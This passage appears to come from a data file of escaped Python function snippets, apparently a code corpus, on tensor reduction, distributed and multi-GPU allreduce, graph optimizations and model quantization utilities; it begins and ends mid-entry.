torch.cat([py_dict[k].flatten() for k in py_key])\n\n dist.all_reduce(flatten_tensor, op=dist.ReduceOp.SUM)\n if op == 'mean':\n flatten_tensor /= world_size\n\n split_tensors = [\n x.reshape(shape) for x, shape in zip(\n torch.split(flatten_tensor, tensor_numels), tensor_shapes)\n ]\n return OrderedDict({k: v for k, v in zip(py_key, split_tensors)})", "def same_scale(*tensors):\n # For each input, pull out data tensor and, if possible, scale tensor\n data_list, scale_list = [], []\n for t in tensors:\n if isinstance(t, STensor):\n data_list.append(t.data)\n scale_list.append(t.scale)\n else:\n if not isinstance(t, torch.Tensor):\n t = torch.tensor(t)\n data_list.append(t)\n scale_list.append(torch.zeros((1,)*len(t.shape)))\n\n # Broadcast data and scale tensors\n data_list = 
torch.broadcast_tensors(*data_list)\n scale_list = torch.broadcast_tensors(*scale_list)\n\n # Get shared scale tensor, which is elementwise max of input scales\n if len(tensors) == 2:\n out_scale = torch.maximum(*scale_list)\n else:\n out_scale = reduce(torch.maximum, scale_list[1:], scale_list[0])\n\n # Rescale all data tensors to correspond to out_scale\n data_list = [t * 2**(s-out_scale) for t, s in zip(data_list, scale_list)]\n\n return tuple(data_list), out_scale", "def rescale_all(self):\n for param_code in self.parameters.keys():\n self.rescale_parameter(param_code)", "def Allreduce4(net, blobs, reduced_affix, gpu_indices):\n a, b, c, d = blobs\n gpu_a, gpu_b, gpu_c, gpu_d = gpu_indices\n # a_reduced <- a+b, c_reduced <- c + d\n a_reduced = net.Add(\n [a, b],\n str(a) + reduced_affix,\n device_option=OnGPU(gpu_a)\n )\n c_reduced = net.Add(\n [c, d],\n str(c) + reduced_affix,\n device_option=OnGPU(gpu_c)\n )\n # a_reduced <- a_reduced + c_reduced\n a_reduced = a_reduced.Add(c_reduced, a_reduced, device_option=OnGPU(gpu_a))\n # broadcast a_reduced to c_reduced\n c_reduced = a_reduced.Copy([], c_reduced, device_option=OnGPU(gpu_c))\n # broadcast to b and d\n b_reduced = a_reduced.Copy(\n [],\n str(b) + reduced_affix,\n device_option=OnGPU(gpu_b)\n )\n d_reduced = c_reduced.Copy(\n [],\n str(d) + reduced_affix,\n device_option=OnGPU(gpu_d)\n )\n return a_reduced, b_reduced, c_reduced, d_reduced", "def Allreduce(net, blobs, reduced_affix=\"_reduced\", gpu_indices=None):\n if gpu_indices is None:\n gpu_indices = list(range(len(blobs)))\n if len(gpu_indices) != len(blobs):\n raise RuntimeError(\n \"gpu_indices length and blobs length mismatch: %d vs %d\" %\n (len(gpu_indices), len(blobs))\n )\n pattern = workspace.GetGpuPeerAccessPattern()\n if len(blobs) == 2 and pattern.shape[0] >= 2 and np.all(pattern[:2, :2]):\n return Allreduce2(net, blobs, reduced_affix, gpu_indices)\n elif len(blobs) == 4 and pattern.shape[0] >= 4 and np.all(pattern[:4, :4]):\n return Allreduce4(net, blobs, reduced_affix, gpu_indices)\n elif len(blobs) == 4 and pattern.shape[0] >= 4 and np.all(pattern[:2, :2]) and np.all(pattern[2:4, 2:4]):\n return Allreduce4Group2(net, blobs, reduced_affix, gpu_indices)\n elif len(blobs) == 8 and pattern.shape[0] >= 8 and np.all(pattern[:8, :8]):\n return Allreduce8(net, blobs, reduced_affix, gpu_indices)\n else:\n return AllreduceFallback(net, blobs, reduced_affix, gpu_indices)", "def reduce_tensor(num_gpus, ts):\n # todo loss of ddp mode\n if isinstance(ts, dict):\n raise NotImplementedError\n else:\n try:\n dist.reduce(ts, dst=0, op=dist.ReduceOp.SUM)\n ts /= num_gpus\n except:\n msg = '{}'.format(type(ts))\n raise NotImplementedError(msg)\n return ts", "def Allreduce(\n self,\n sendbuf: Union[DNDarray, torch.Tensor, Any],\n recvbuf: Union[DNDarray, torch.Tensor, Any],\n op: MPI.Op = MPI.SUM,\n ):\n ret, sbuf, rbuf, buf = self.__reduce_like(self.handle.Allreduce, sendbuf, recvbuf, op)\n if buf is not None and isinstance(buf, torch.Tensor) and buf.is_cuda and not CUDA_AWARE_MPI:\n buf.copy_(rbuf)\n return ret", "def perturb_tensors(self, scaling: str = 'none'):\n if self.clustering is True:\n for cluster in self.clusters:\n cluster.perturb_tensors()\n else:\n for name, item in tqdm(self.tensor_info.items(), 'Perturbing tensors'):\n tens = item[0]\n pert = item[1]\n repr = item[2]\n if repr is not None:\n repr.convert_tensor(tens)\n if pert is not None:\n for perturb in pert:\n if perturb is not None:\n perturb(tens, repr, scaling)", "def Allreduce4Group2(net, blobs, 
reduced_affix, gpu_indices):\n a, b, c, d = blobs\n gpu_a, gpu_b, gpu_c, gpu_d = gpu_indices\n # a_reduced <- a+b, c_reduced <- c + d\n a_reduced = net.Add(\n [a, b],\n str(a) + reduced_affix,\n device_option=OnGPU(gpu_a)\n )\n c_reduced = net.Add(\n [c, d],\n str(c) + reduced_affix,\n device_option=OnGPU(gpu_c)\n )\n # copy from c_reduce(gpu_c) to c_reduce_copy(gpu_a)\n c_reduced_copy = c_reduced.Copy(\n [],\n str(c_reduced) + '_copy',\n device_option=OnGPU(gpu_a)\n )\n # a_reduced <- a_reduced + c_reduced_copy\n a_reduced = a_reduced.Add(c_reduced_copy, a_reduced, device_option=OnGPU(gpu_a))\n # broadcast a_reduced to c_reduced\n c_reduced = a_reduced.Copy([], c_reduced, device_option=OnGPU(gpu_c))\n # broadcast to b and d\n b_reduced = a_reduced.Copy(\n [],\n str(b) + reduced_affix,\n device_option=OnGPU(gpu_b)\n )\n d_reduced = c_reduced.Copy(\n [],\n str(d) + reduced_affix,\n device_option=OnGPU(gpu_d)\n )\n return a_reduced, b_reduced, c_reduced, d_reduced", "def __call__(self, *args):\n assert len(args) == len(self.batch_axis), f'Number of arguments passed {len(args)} must match ' \\\n f'batched {len(self.batch_axis)}'\n nsplits = args[self.batch_axis_argnums[0][0]].shape[self.batch_axis_argnums[0][1]]\n output, changes = self._call(self.vc.tensors(), [v.split(nsplits) for v in self.vc.subset(RandomState)], *args)\n for v, u in zip(self.vc, changes):\n v.reduce(u)\n return output", "def reduce_mean(tensor):\n if not (dist.is_available() and dist.is_initialized()):\n return tensor\n tensor = tensor.clone()\n dist.all_reduce(tensor.div_(dist.get_world_size()), op=dist.ReduceOp.SUM)\n return tensor", "def reduce_mean(tensor):\n if not (dist.is_available() and dist.is_initialized()):\n return tensor\n tensor = tensor.clone()\n dist.all_reduce(tensor.div_(dist.get_world_size()), op=dist.ReduceOp.SUM)\n return tensor", "def Allreduce2(net, blobs, reduced_affix, gpu_indices):\n a, b = blobs\n gpu_a, gpu_b = gpu_indices\n a_reduced = net.Add([a, b], a + reduced_affix, device_option=OnGPU(gpu_a))\n b_reduced = a_reduced.Copy(\n [],\n b + reduced_affix,\n device_option=OnGPU(gpu_b)\n )\n return a_reduced, b_reduced", "def scalar_reduce(self, quantity, avg=False):\n\n base = self.sims[0].conf['General']['results_dir']\n self.log.info('Performing scalar reduction for group at %s' % base)\n self.log.debug('QUANTITY: %s'%quantity)\n group_comb = self.sims[0].get_scalar_quantity(quantity)\n self.log.debug(group_comb.dtype)\n self.sims[0].clear_data()\n # This approach is more memory efficient then building a 2D array\n # of all the data from each group and summing along an axis\n for sim in self.sims[1:]:\n self.log.debug(sim.id)\n quant = sim.get_scalar_quantity(quantity)\n self.log.debug(quant.dtype)\n group_comb += quant\n sim.clear_data()\n if avg:\n group_comb = group_comb / self.num_sims\n fname = 'scalar_reduce_avg_%s' % quantity\n else:\n fname = 'scalar_reduce_%s' % quantity\n path = os.path.join(base, fname)\n ftype = self.sims[0].conf['General']['save_as']\n if ftype == 'npz':\n np.save(path, group_comb)\n elif ftype == 'hdf5':\n self.log.warning('FIX HDF5 SCALAR REDUCE SAVING')\n np.save(path, group_comb)\n else:\n raise ValueError('Invalid file type in config')", "def Allreduce8(net, blobs, reduced_affix, gpu_indices):\n reduced = [None] * 8\n # Reduction level 1\n for i in [0, 2, 4, 6]:\n reduced[i] = net.Add(\n [blobs[i], blobs[i + 1]],\n blobs[i] + reduced_affix,\n device_option=OnGPU(gpu_indices[i])\n )\n # Reduction level 2\n for i in [0, 4]:\n reduced[i] = net.Add(\n 
[reduced[i], reduced[i + 2]],\n str(blobs[i]) + reduced_affix,\n device_option=OnGPU(gpu_indices[i])\n )\n # Reduction level 3: this involves a copy.\n reduced_4_copy = reduced[4].Copy(\n [],\n str(reduced[4]) + '_copy',\n device_option=OnGPU(gpu_indices[0])\n )\n reduced[0] = reduced[0].Add(\n reduced_4_copy,\n reduced[0],\n device_option=OnGPU(gpu_indices[0])\n )\n # Broadcast level 1\n reduced[4] = reduced[0].Copy(\n [],\n reduced[4],\n device_option=OnGPU(gpu_indices[4])\n )\n # Broadcast level 2\n for i in [2, 6]:\n reduced[i] = reduced[i - 2].Copy(\n [],\n reduced[i],\n device_option=OnGPU(gpu_indices[i])\n )\n # Broadcast level 3\n for i in [1, 3, 5, 7]:\n reduced[i] = reduced[i - 1].Copy(\n [],\n blobs[i] + reduced_affix,\n device_option=OnGPU(gpu_indices[i])\n )\n return reduced", "def conv_reduce_sum(x, result_shape, padding, strides):\n if len(result_shape) == 3:\n return conv2d_reduce_sum(x, result_shape[0], result_shape[1],\n padding, strides)\n elif len(result_shape) == 2:\n return conv1d_reduce_sum(x, result_shape[0], padding, strides[0])\n else:\n raise ValueError()", "def compute_all(self) -> Any:\n self._check_for_increment(\"compute_all\")\n # The i!=0 accounts for the self._base_metric should be ignored\n res = [metric.compute() for i, metric in enumerate(self) if i != 0]\n try:\n if isinstance(res[0], dict):\n keys = res[0].keys()\n return {k: torch.stack([r[k] for r in res], dim=0) for k in keys}\n if isinstance(res[0], list):\n return torch.stack([torch.stack(r, dim=0) for r in res], 0)\n return torch.stack(res, dim=0)\n except TypeError: # fallback solution to just return as it is if we cannot succesfully stack\n return res", "def all_sum(structure, name=None):\n num_replicas = get_num_replicas()\n\n if num_replicas <= 1:\n return structure\n\n tf_replicator = get_tf_replicator()\n if tf_replicator:\n return tf_replicator.all_sum(structure)\n\n elif tf.distribute.has_strategy() and tf.distribute.get_replica_context():\n return tf.distribute.get_replica_context().all_reduce(\n tf.distribute.ReduceOp.SUM, structure)\n\n elif is_tpu_replicated():\n def tpu_all_sum(tensor):\n return tpu_ops.cross_replica_sum(tensor, name=name)\n\n return nest.map_structure(tpu_all_sum, structure)\n\n return structure", "def _model_compute_all(self, inputs):\n\n return self.model.compute_all(inputs)", "def local_sum_mul_by_scalar(node):\r\n # TODO: if the the thing inside the Sum is a division,\r\n # we should get at the numerator....\r\n if isinstance(node.op, T.Sum):\r\n thing_summed, = node.inputs\r\n if thing_summed.owner and thing_summed.owner.op == T.mul:\r\n terms = thing_summed.owner.inputs\r\n scalars = [t.dimshuffle() for t in terms if\r\n numpy.all(t.type.broadcastable)]\r\n non_scalars = [t for t in terms if not numpy.all(t.broadcastable)]\r\n if scalars:\r\n if len(scalars) > 1:\r\n if len(non_scalars) > 1:\r\n return [T.mul(T.mul(*scalars),\r\n node.op(T.mul(*non_scalars)))]\r\n elif len(non_scalars) == 1:\r\n return [T.mul(T.mul(*scalars),\r\n node.op(non_scalars[0]))]\r\n else:\r\n return [T.mul(*scalars)]\r\n else:\r\n if len(non_scalars) > 1:\r\n return [T.mul(scalars[0],\r\n node.op(T.mul(*non_scalars)))]\r\n elif len(non_scalars) == 1:\r\n return [T.mul(scalars[0], node.op(non_scalars[0]))]\r\n else:\r\n return [scalars[0]]\r\n if thing_summed.owner and thing_summed.owner.op == T.neg:\r\n return [T.neg(node.op(thing_summed.owner.inputs[0]))]", "def Iallreduce(\n self,\n sendbuf: Union[DNDarray, torch.Tensor, Any],\n recvbuf: Union[DNDarray, torch.Tensor, Any],\n op: 
MPI.Op = MPI.SUM,\n ) -> MPIRequest:\n return MPIRequest(*self.__reduce_like(self.handle.Iallreduce, sendbuf, recvbuf, op))", "def aggregate(self, xs: List[Tensor]):\n if self.aggr == \"concat\":\n return torch.cat(xs, dim=-1)\n\n x = torch.stack(xs, dim=-1)\n if self.aggr == \"add\":\n return x.sum(dim=-1)\n elif self.aggr == \"mean\":\n return x.mean(dim=-1)\n elif self.aggr == \"max\":\n return x.max(dim=-1)[0]\n elif self.aggr == \"mul\":\n return x.prod(dim=-1)[0]", "def relay_array_reduce(c, fn, array, shape):\n assert fn.is_constant(Primitive)\n assert shape.is_constant(tuple)\n fn = fn.value\n tshp = shape.value\n ary = c.ref(array)\n if fn == P.scalar_add:\n ashp = ashape(array)\n if len(tshp) < len(ashp):\n ts = (1,) * (len(ashp) - len(tshp)) + tshp\n else:\n ts = tshp\n axis = tuple(i for i, t in enumerate(ts) if t == 1)\n res = relay.op.sum(ary, axis=axis, keepdims=True)\n if len(tshp) < len(ashp):\n rtshp = tshp\n if tshp == ():\n tshp = (1,)\n res = relay.op.reshape(res, newshape=tshp)\n if rtshp == ():\n res = relay.op.take(res, relay.const(0))\n return res\n elif fn == P.scalar_mul:\n ashp = ashape(array)\n if len(tshp) in (0, len(ashp)):\n res = relay.op.prod(ary)\n else:\n raise NotImplementedError(\n 'We currently support only full product on an array.')\n return res\n else:\n raise NotImplementedError(f\"reduce with {fn}\")", "def dim_reduce(means, weights, d):\n return dim_reduce_data(means, d)", "def _filter_and_allreduce_gradients(grads_and_vars,\n allreduce_precision=\"float32\"):\n filtered_grads_and_vars = _filter_grads(grads_and_vars)\n (grads, variables) = zip(*filtered_grads_and_vars)\n if allreduce_precision == \"float16\":\n grads = [tf.cast(grad, \"float16\") for grad in grads]\n allreduced_grads = tf.distribute.get_replica_context().all_reduce(\n tf.distribute.ReduceOp.SUM, grads)\n if allreduce_precision == \"float16\":\n allreduced_grads = [tf.cast(grad, \"float32\") for grad in allreduced_grads]\n return allreduced_grads, variables", "def _fold_to_scale(conv_wrapper: QcQuantizeWrapper, bn_wrapper: QcQuantizeWrapper):\n # pylint: disable=protected-access, too-many-locals, too-many-branches, bad-whitespace, too-many-statements\n conv = conv_wrapper._module_to_wrap\n bn = bn_wrapper._module_to_wrap\n\n weight_quantizer = conv_wrapper.param_quantizers[\"weight\"]\n\n if not isinstance(weight_quantizer, LearnedGridTensorQuantizer):\n raise _BatchNormFoldingNotSupported(\n \"BatchNorm folding to scale supports LearnedGridTensorQuantizer only; \"\n f\"got {type(weight_quantizer)}.\"\n )\n\n output_quantizer = conv_wrapper.output_quantizers[0]\n\n if output_quantizer.enabled:\n raise _BatchNormFoldingNotSupported(\n \"BatchNorm should belong to the same supergroup with the layer to be folded to.\"\n )\n\n if \"bias\" in conv_wrapper.param_quantizers:\n bias_quantizer = conv_wrapper.param_quantizers[\"bias\"]\n if bias_quantizer.enabled:\n raise _BatchNormFoldingNotSupported(\n \"Can't fold BatchNorm to scale if bias quantizer is enabled.\"\n )\n\n encodings = weight_quantizer.encoding\n\n if encodings is None:\n raise RuntimeError\n\n if isinstance(encodings, libpymo.TfEncoding):\n encodings = [encodings]\n\n if isinstance(conv, _ConvTransposeNd) and conv.groups != 1:\n raise _BatchNormFoldingNotSupported(\n \"BatchNorm folding to scale is not supported for grouped ConvTransposeNd.\"\n )\n\n # Add quantization noise to the BN params (bn weight & bn bias) before folding.\n # NOTE: Quantization of foldable batchnorms is automatically disabled when\n # initializing 
quantsim. However, it is still safer to call _quantize_params here\n # as we can't guarantee this is always the case.\n # For example, the user can manually enable quantization of batchnorms, etc...\n # (FYI: _quantize_params takes effect only when the parameter quantizers are enabled)\n with bn_wrapper._quantize_params():\n _fold_to_weight(conv, bn, fold_backward=True)\n\n gamma = bn.weight\n sigma = torch.sqrt(bn.running_var + bn.eps)\n\n new_encodings = []\n for old_encoding, c in zip(encodings, gamma/sigma):\n new_encoding = libpymo.TfEncoding()\n new_encoding.delta = old_encoding.delta * abs(c)\n if c >= 0:\n new_encoding.max = old_encoding.max * c\n new_encoding.min = old_encoding.min * c\n else:\n new_encoding.max = old_encoding.min * c\n new_encoding.min = old_encoding.max * c\n new_encoding.offset = old_encoding.offset\n new_encoding.bw = old_encoding.bw\n new_encodings.append(new_encoding)\n\n weight_quantizer.encoding = new_encodings\n\n # Copy batchnorm's output quantizers to conv output quantizers\n for conv_output_quantizer, bn_output_quantizer in\\\n zip(conv_wrapper.output_quantizers, bn_wrapper.output_quantizers):\n conv_output_quantizer.enabled = bn_output_quantizer.enabled\n\n if bn_output_quantizer.encoding is not None:\n encoding = libpymo.TfEncoding()\n encoding.delta = bn_output_quantizer.encoding.delta\n encoding.max = bn_output_quantizer.encoding.max\n encoding.min = bn_output_quantizer.encoding.min\n encoding.offset = bn_output_quantizer.encoding.offset\n encoding.bw = bn_output_quantizer.encoding.bw\n conv_output_quantizer.encoding = encoding\n\n bn_output_quantizer.enabled = False\n\n if \"bias\" not in conv_wrapper.param_quantizers:\n bias_quantizer = LearnedGridTensorQuantizer(weight_quantizer.bitwidth,\n weight_quantizer.round_mode,\n weight_quantizer.quant_scheme,\n weight_quantizer.use_symmetric_encodings,\n enabled_by_default=False,\n data_type=weight_quantizer.data_type)\n bias_quantizer._ch_axis = weight_quantizer._ch_axis\n conv_wrapper.param_quantizers[\"bias\"] = bias_quantizer", "def reduce(x, reduce='IncrementalPCA', ndims=3, normalize=None, align=None,\n model=None, model_params=None, internal=False):\n\n # sub functions\n def reduce_list(x, model):\n split = np.cumsum([len(xi) for xi in x])[:-1]\n x_r = np.vsplit(model.fit_transform(np.vstack(x)), split)\n if len(x)>1:\n return [xi for xi in x_r]\n else:\n return [x_r[0]]\n\n # dictionary of models\n models = {\n 'PCA' : PCA,\n 'IncrementalPCA' : IncrementalPCA,\n 'SparsePCA' : SparsePCA,\n 'MiniBatchSparsePCA' : MiniBatchSparsePCA,\n 'KernelPCA' : KernelPCA,\n 'FastICA' : FastICA,\n 'FactorAnalysis' : FactorAnalysis,\n 'TruncatedSVD' : TruncatedSVD,\n 'DictionaryLearning' : DictionaryLearning,\n 'MiniBatchDictionaryLearning' : MiniBatchDictionaryLearning,\n 'TSNE' : TSNE,\n 'Isomap' : Isomap,\n 'SpectralEmbedding' : SpectralEmbedding,\n 'LocallyLinearEmbedding' : LocallyLinearEmbedding,\n 'MDS' : MDS\n }\n\n # deprecated warning\n if (model is not None) or (model_params is not None):\n warnings.warn('Model and model params will be deprecated. Please use the \\\n reduce keyword. 
See API docs for more info: http://hypertools.readthedocs.io/en/latest/hypertools.tools.reduce.html#hypertools.tools.reduce')\n reduce = {}\n reduce['model'] = model\n reduce['params'] = model_params\n\n # if model is None, just return data\n if reduce is None:\n return x\n else:\n\n # common format\n x = format_data(x, ppca=True)\n\n # deprecation warnings\n if normalize is not None:\n warnings.warn('The normalize argument will be deprecated for this function. Please use the \\\n analyze function to perform combinations of these transformations. See API docs for more info: http://hypertools.readthedocs.io/en/latest/hypertools.analyze.html#hypertools.analyze')\n x = normalizer(x, normalize=normalize)\n\n if align is not None:\n warnings.warn('The align argument will be deprecated for this function. Please use the \\\n analyze function to perform combinations of these transformations. See API docs for more info: http://hypertools.readthedocs.io/en/latest/hypertools.analyze.html#hypertools.analyze')\n x = aligner(x, align=align)\n\n # if the shape of the data is already less than ndims, just return it\n if all([i.shape[1]<=ndims for i in x]):\n return x\n\n # if reduce is a string, find the corresponding model\n if type(reduce) in [str, np.string_]:\n model = models[reduce]\n model_params = {\n 'n_components' : ndims\n }\n # if its a dict, use custom params\n elif type(reduce) is dict:\n if type(reduce['model']) is str:\n model = models[reduce['model']]\n if reduce['params'] is None:\n model_params = {\n 'n_components' : ndims\n }\n else:\n model_params = reduce['params']\n if 'n_components' not in model_params:\n model_params['n_components'] = ndims\n\n # initialize model\n model = model(**model_params)\n\n # reduce data\n x_reduced = reduce_list(x, model)\n\n # return data\n if internal or len(x_reduced)>1:\n return x_reduced\n else:\n return x_reduced[0]", "def prod(tensor, axis=None):\n raise NotImplementedError", "def prod(self, axis=None, keepdims=False, dtype=None, out=None):\n return np.multiply.reduce(\n self, out=out, axis=axis, keepdims=keepdims, dtype=dtype\n )", "def scale(self, factors):\n if isinstance(factors, numbers.Number):\n factors = np.ones(self.dim) * factors;\n self.raw_wires.scale(factors);", "def AllreduceFallback(net, blobs, reduced_affix, gpu_indices):\n reduced = [None] * len(gpu_indices)\n if reduced_affix != '':\n # copy first\n reduced[0] = net.Copy(\n blobs[0],\n blobs[0] + reduced_affix,\n device_option=OnGPU(gpu_indices[0])\n )\n else:\n reduced[0] = blobs[0]\n # do temp copy and add\n temp_name = reduced[0] + '_temp_copy'\n for i in range(1, len(gpu_indices)):\n temp = net.Copy(\n blobs[i],\n temp_name,\n device_option=OnGPU(gpu_indices[0])\n )\n reduced[0] = net.Add(\n [temp, reduced[0]],\n reduced[0],\n device_option=OnGPU(gpu_indices[0])\n )\n # Broadcast to everyone else\n for i in range(1, len(gpu_indices)):\n reduced[i] = net.Copy(\n reduced[0],\n blobs[i] + reduced_affix,\n device_option=OnGPU(gpu_indices[i])\n )\n return reduced", "def minimize_using_explicit_allreduce(tape,\n optimizer,\n loss,\n trainable_variables,\n pre_allreduce_callbacks=None,\n post_allreduce_callbacks=None):\n if isinstance(optimizer,\n tf.keras.mixed_precision.LossScaleOptimizer):\n # FP16 GPU code path\n with tape:\n scaled_loss = optimizer.get_scaled_loss(loss)\n scaled_grads = tape.gradient(scaled_loss, trainable_variables)\n grads_and_vars = zip(scaled_grads, trainable_variables)\n if pre_allreduce_callbacks:\n grads_and_vars = _run_callbacks(pre_allreduce_callbacks, 
grads_and_vars)\n (allreduced_scaled_grads,\n filtered_training_vars) = _filter_and_allreduce_gradients(\n grads_and_vars, allreduce_precision=\"float16\")\n allreduced_unscaled_grads = optimizer.get_unscaled_gradients(\n allreduced_scaled_grads)\n grads_and_vars = zip(allreduced_unscaled_grads, filtered_training_vars)\n else:\n # TPU or FP32 GPU code path\n grads = tape.gradient(loss, trainable_variables)\n grads_and_vars = zip(grads, trainable_variables)\n if pre_allreduce_callbacks:\n grads_and_vars = _run_callbacks(pre_allreduce_callbacks, grads_and_vars)\n (allreduced_grads,\n filtered_training_vars) = _filter_and_allreduce_gradients(\n grads_and_vars, allreduce_precision=\"float32\")\n grads_and_vars = zip(allreduced_grads, filtered_training_vars)\n if post_allreduce_callbacks:\n grads_and_vars = _run_callbacks(post_allreduce_callbacks, grads_and_vars)\n optimizer.apply_gradients(\n grads_and_vars, experimental_aggregate_gradients=False)", "def __imul__(self, tensor):\n return self.mul_(tensor)", "def normalize_to_sum_one(in_tensor, tensor_rank, sum_one_indices_cnt=0):\n if sum_one_indices_cnt == 0:\n total_sum = tf.reduce_sum(in_tensor)\n return in_tensor / total_sum\n\n tensor_shape = tf.shape(in_tensor)\n sum_tensor = tf.reduce_sum(in_tensor, reduction_indices=range(sum_one_indices_cnt, tensor_rank), keep_dims=True)\n denominator = tf.tile(sum_tensor, tf.concat(0, [tf.ones([sum_one_indices_cnt], dtype=dtypes.int32),\n tensor_shape[sum_one_indices_cnt:]]))\n return in_tensor / denominator", "def all_reduce(self):\n return {k: reduce_number(v) for k, v in self.items()}", "def mpi_allreduce(data, operator: Union[int, str, None] = None):\n if operator:\n return MPI.COMM_WORLD.allreduce(data, op=Operator.operator(operator))\n else:\n return MPI.COMM_WORLD.allreduce(data)", "def all_reduce_data(grads, comm, rank, size):\r\n\r\n sendbuf_grads = []\r\n shapes = []\r\n\r\n # flatten each gradient from ndarray to list\r\n # store the shapes\r\n for grad in grads:\r\n shapes.append(grad.shape)\r\n sendbuf_grads += grad.flatten().tolist()\r\n\r\n # list is immutable and thus cannot be changed inplace by allreduce\r\n # need to convert lists to buffer-like ndarrays\r\n sendbuf_grads = np.array(sendbuf_grads)\r\n recvbuf_grads = np.zeros(len(sendbuf_grads))\r\n comm.Allreduce(sendbuf_grads, recvbuf_grads)\r\n\r\n # recover to a list of correctly shaped ndarray\r\n reduced_grads = []\r\n start = 0\r\n for shape in shapes:\r\n # NOTE: np.prod returns random result when overflow!\r\n num_elems = np.prod(shape)\r\n curr_elems = recvbuf_grads[start:start+num_elems]\r\n reduced_grads.append(np.array(curr_elems).reshape(shape))\r\n start += num_elems\r\n\r\n return reduced_grads\r\n\r\n sendbuf_grads = []\r\n shapes = []\r\n\r\n # flatten each gradient from ndarray to list\r\n # store the shapes\r\n for grad in grads:\r\n shapes.append(grad.shape)\r\n sendbuf_grads += grad.flatten().tolist()\r\n\r\n # list is immutable and thus cannot be changed inplace by allreduce\r\n # need to convert lists to buffer-like ndarrays\r\n sendbuf_grads = np.array(sendbuf_grads)\r\n recvbuf_grads = np.zeros(len(sendbuf_grads))\r\n comm.Allreduce(sendbuf_grads, recvbuf_grads)\r\n\r\n # recover to a list of correctly shaped ndarray\r\n reduced_grads = []\r\n start = 0\r\n for shape in shapes:\r\n # NOTE: np.prod returns random result when overflow!\r\n num_elems = np.prod(shape)\r\n curr_elems = recvbuf_grads[start:start + num_elems]\r\n reduced_grads.append(np.array(curr_elems).reshape(shape))\r\n start += 
num_elems\r\n\r\n return reduced_grads", "def local_reduce_broadcastable(node):\r\n if isinstance(node.op, T.CAReduce):\r\n reduced, = node.inputs\r\n odtype = node.outputs[0].dtype\r\n if node.op.axis is None:\r\n if all(reduced.broadcastable):\r\n return [reduced.dimshuffle().astype(odtype)]\r\n else:\r\n axis = list(node.op.axis)\r\n cuttable = [a for a in axis if reduced.broadcastable[a]]\r\n if cuttable:\r\n # -- we can remove some axes of summation,\r\n # which simplifies the codegen for sum, especially on GPU\r\n new_axis = []\r\n pattern = []\r\n ii = 0\r\n for p in range(reduced.ndim):\r\n if p not in cuttable:\r\n if p in axis:\r\n new_axis.append(ii)\r\n pattern.append(p)\r\n ii += 1\r\n new_reduced = reduced.dimshuffle(*pattern)\r\n if new_axis:\r\n if type(node.op) == theano.tensor.elemwise.CAReduce:\r\n # This happen for tensor.max(), tensor.min()\r\n new_op = node.op.__class__(node.op.scalar_op,\r\n axis=new_axis)\r\n else:\r\n new_op = node.op.__class__(axis=new_axis)\r\n return [new_op(new_reduced)]\r\n else:\r\n # -- in this case we can remove the reduction completely\r\n return [new_reduced.astype(odtype)]", "def reduce_loss(self, all_loss):\n if self._gpu_num == 1:\n total_loss = all_loss[0]\n else:\n layer_loss = [all_loss[j] for j in range(self._gpu_num)]\n total_loss = tf.reduce_mean(layer_loss)\n\n return total_loss", "def allreduce( # pylint:disable=invalid-name\n data: np.ndarray, op: Op, prepare_fun: Optional[Callable[[np.ndarray], None]] = None\n) -> np.ndarray:\n if prepare_fun is None:\n return collective.allreduce(data, collective.Op(op))\n raise Exception(\"preprocessing function is no longer supported\")", "def update_all(self, message_func=\"default\",\n reduce_func=\"default\",\n apply_node_func=\"default\"):\n num_worker_nodes = int(self.number_of_nodes() / self.num_workers) + 1\n start_node = self.worker_id * num_worker_nodes\n end_node = min((self.worker_id + 1) * num_worker_nodes, self.number_of_nodes())\n worker_nodes = np.arange(start_node, end_node, dtype=np.int64)\n self.pull(worker_nodes, message_func, reduce_func, apply_node_func, inplace=True)\n self._sync_barrier()", "def reduce_sum_encoder(inputs):\n return tf.reduce_sum(inputs, axis=1)", "def compute(self, labels, logits, weights, reduction, mask=None):\n logits = self.get_logits(logits)\n losses, loss_weights = self._compute_unreduced_loss_impl(\n labels, logits, mask)\n weights = tf.multiply(\n self._normalize_weights_impl(labels, weights), loss_weights)\n return tf.compat.v1.losses.compute_weighted_loss(\n losses, weights, reduction=reduction)", "def scaleAll(self, scale):\n center = [self.width/2, self.height/2, 0, 0]\n matrix = self.scaleMatrix(scale, scale, scale)\n\n for wireframe in self.wireframes.values():\n wireframe.scale(center, matrix)", "def test_reduce_scaling(self, data, all_numeric_reductions, skipna):\n op_name = all_numeric_reductions\n s_nm = pd.Series(data)\n # Attention: `mm` is fine here, but with `m`, the magnitudes become so small\n # that pandas discards them in the kurtosis calculation, leading to different results.\n s_mm = pd.Series(PintArray.from_1darray_quantity(data.quantity.to(ureg.mm)))\n\n # min/max with empty produce numpy warnings\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", RuntimeWarning)\n r_nm = getattr(s_nm, op_name)(skipna=skipna)\n r_mm = getattr(s_mm, op_name)(skipna=skipna)\n if isinstance(r_nm, ureg.Quantity):\n # convert both results to the same units, then take the magnitude\n v_nm = r_nm.m_as(r_mm.units)\n v_mm = 
r_mm.m\n else:\n v_nm = r_nm\n v_mm = r_mm\n assert np.isclose(v_nm, v_mm, rtol=1e-3), f\"{r_nm} == {r_mm}\"", "def __mul__(self, tensor):\n return self.mul(tensor)", "def scale(self, state, action):\n control_action = action[..., : self._true_dim_action[0]]\n scale = super().scale(state, control_action)\n\n return scale", "def squash(vectors, axis=-1):\n s_squared_norm = K.sum(K.square(vectors), axis, keepdims=True)\n scale = s_squared_norm / (1 + s_squared_norm)/ K.sqrt(s_squared_norm)\n return scale * vectors", "def scaled_reduce_dict_to_tensor(dataset_grad_p_dict: Mapping[str,torch.Tensor], dataset_names: List[str], scales=Mapping[str,float]):\n assert len(dataset_grad_p_dict.values()) > 0\n\n item0 = list(dataset_grad_p_dict.values())[0]\n sum_tensor = torch.zeros_like(item0)\n for dname in dataset_names:\n sum_tensor += scales[dname] * dataset_grad_p_dict[dname]\n\n return sum_tensor", "def reduce_sum(\n input_tensor: remote_blob_util.BlobDef,\n axis: Optional[Union[int, Sequence[int]]] = None,\n keepdims: bool = False,\n name: Optional[str] = None,\n) -> remote_blob_util.BlobDef:\n name = _gen_unique_name_if_need(name, \"ReduceSum_\")\n\n axis = _check_axis(axis, input_tensor.shape)\n if len(axis) == 0:\n return input_tensor\n\n op = (\n flow.user_op_builder(name)\n .Op(\"reduce_sum\")\n .Input(\"input_tensor\", [input_tensor])\n .Output(\"output_tensor\")\n .Attr(\"axis\", axis)\n .Attr(\"keepdims\", keepdims)\n .Build()\n )\n return op.InferAndTryRun().SoleOutputBlob()", "def 